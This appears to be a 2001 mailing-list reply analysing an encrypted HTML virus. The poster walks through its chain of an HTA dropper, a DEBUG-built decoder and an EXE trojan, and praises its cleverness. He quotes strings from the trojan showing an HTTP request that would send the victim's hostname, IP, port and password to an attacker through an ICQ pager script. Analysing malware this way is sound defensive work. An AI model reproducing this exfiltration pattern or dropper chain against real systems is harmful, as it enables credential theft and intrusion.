Security Incidents mailing list archives

Re: encrypted html based virus


From: Dzzie Z <dzzie () YAHOO COM>
Date: Thu, 18 Jan 2001 20:15:31 -0500

hats off to whoever made this originally :) it is a pretty neat flow of
events here....the whole thing is a masterpiece...

webpage decodes actual malicious commands, refreshes browser to run page's
new content

browser executes new code and writes hta

on reboot(?) hta goes into effect..(unless somehow that long non-ascii
string overflows a buffer..there was a package named godmessage a while
back that worked like this on a couple activex controls...humm wonder)

-the classID in the decoded page maps to:
  "Object for constructing type libraries for scriptlets"
  inprocserver= C:\WINDOWS\SYSTEM\SCROBJ.DLL
  ( anyone know anything more about this dll? )

so the hta first writes xxdecode.src which looks like assembler commands

runs it through debug to turn it into machine code (xxdecode.com)

writes an encoded file and decodes it with its own com decoder to create a
live exe...

I am amazed they could squeeze all that functionality into an html scripting
exploit...i wonder why they didn't just disassemble the exe they were after
and run that through debug? does uuencode compress? bet this probably comes
from a wrapped hack program...probably from TLsecurity thinking back to the
title in the decoded web page...going to have to root around and see if I
can find it


the exe looks like a trojan...contacts someone through their icq pager

q.com.GET./scrip
ts/WWPMsg.dll?fr
om=Asylum&fromem
ail=Asylum&subje
ct=%s&body=hey+t
here,+ive+been+c
ommitted...+[nam
e=%s]_[hostname=
%s]_[ip=%s]_[por
t=%s]_[password=
%s]_[version=0.1
.3]_[winver=%s]&
to=%s.HTTP/1.0..
.....abcdefghijk
lmnopqr.36063200
...%s\%s.winpcf3
2.exe.%s\system.
ini.%s\win.ini.e
xplorer.exe.%s.b

wish I had a junk drive to run it on so I could grab the packets :)

thanks for sharing :) techniques like this just expand thought sooo
much...I can't imagine how long it took to develop this...the debug trick is
beautiful...the only other place I have seen that is in an old-school bat
file --> com maker....

when I went to check the base href in the original file...it gave me a
crash page...lots of con\con and nul\nul imgs and other scripting tricks...
but I looked into the server and they are a free web host with cgi
scripting...so probably just a rogue user name "theproxyjudge" over a
compromised system.

if this was an overflow of an old activex control buffer it is likely to
have been pre IE5(?) so they might have given me a page to fit to my
browser version...

